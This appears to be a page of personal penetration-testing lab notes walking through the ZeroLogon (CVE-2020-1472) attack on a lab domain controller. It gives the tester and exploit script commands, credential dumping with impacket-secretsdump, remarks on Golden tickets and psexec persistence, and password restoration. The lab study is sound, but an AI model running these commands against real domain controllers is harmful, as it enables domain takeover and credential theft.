ZeroLogon Attacks

PRACTICE ! PRACTICE ! PRACTICE !

This is a serious vulnerability which sets the Domain's Administrator password to null :) - The logic behind this vulnerability deals with Windows Cryptographic Security Measures, Let's first test if the DC is vulnerable to this exploit or not using a python script

$ python3 zerologon_tester.py HYDRA-DC 192.168.169.147

Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.

Since now it's vulnerable, let's exploit the DC :)

$ python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.169.147

Performing authentication attempts...
Target vulnerable, changing account password to empty string
Result: 0

Now how do we check if the Administrator's password is really set to null or not ?

$ impacket-secretsdump -just-dc MARVEL/HYDRA-DC\$@192.168.169.147
Password: <Hit Enter>
[ REDACTED ]

We can pretty much generate Golden tickets for persistance, take advantage of any user on the domain and psexec into them and do anything :)

Now how do we restore this ?

$ impacket-secretsdump administrator@192.168.169.147 -hashes <NT Hash>:<LM Hash>

Copy down the hex value and run the restore python script

$ python3 restorepassword.py MARVEL/HYRDA-DC@HYDRA-DC -target-ip 192.168.169.147 -hexpass <HEX VALUE>
[ REDACTED ]
Change Password OK

What Is Zerologon?Trend Micro

PreviousGolden Ticket Attacks NextLateral Movement and Pivoting

Last updated 2 years ago